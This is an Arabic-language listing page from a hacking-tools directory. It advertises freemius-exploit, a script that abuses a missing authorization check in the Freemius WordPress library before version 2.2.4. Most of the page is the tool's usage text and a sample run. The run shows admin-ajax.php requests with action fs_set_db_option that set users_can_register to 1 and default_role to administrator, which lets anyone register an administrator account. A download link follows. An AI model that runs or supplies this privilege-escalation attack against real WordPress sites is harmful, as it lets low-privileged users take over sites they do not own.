Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
freemius-exploit — مكتبة Freemius < 2.2.4 - تحديث خيارات تعسفي لمستخدم Subscriber+ | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/freemius-exploit
المصادقة والترخيصتصعيد الامتيازاتالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراق
GitHubrandomrobbiebf/freemius-exploit

freemius-exploit

مكتبة Freemius < 2.2.4 - تحديث خيارات تعسفي لمستخدم Subscriber+

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

freemius-exploit

مكتبة Freemius < 2.2.4 - تحديث خيارات تعسفي للمشترك+

الوصف

المكتبة، المستخدمة في العديد من الإضافات، لا تملك تفويضًا مناسبًا عند تحديث خيارات المدونة، مما يسمح لأي مستخدم مصادَق، مثل المشترك، بتحديث خيارات تعسفية.

الاستخدام

root@kitploit:~
usage: exploit.py [-h] -u URL [-un USERNAME] [-p PASSWORD] [-f FIX]

Freemius Library < 2.2.4 - Subscriber+ Arbitrary Option Update Description: The library, used in numerous plugins, does not have proper authorization when updating blog
options, allowing any authenticated users, such as a subscriber, to update arbitrary options.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Website URL
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -f FIX, --fix FIX     Reset after Exploit

مثال

root@kitploit:~
$ python3 exploit.py -u http://wordpress.lan -un user -p useruser1
Plugin: wp-affiliate-disclosure   Version: 1.1.4   Not found.
Info: Using plugin 404-to-301 running version 3.0.1
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=users_can_register&option_value=1
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=default_role&option_value=administrator
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.
تنزيل الأداة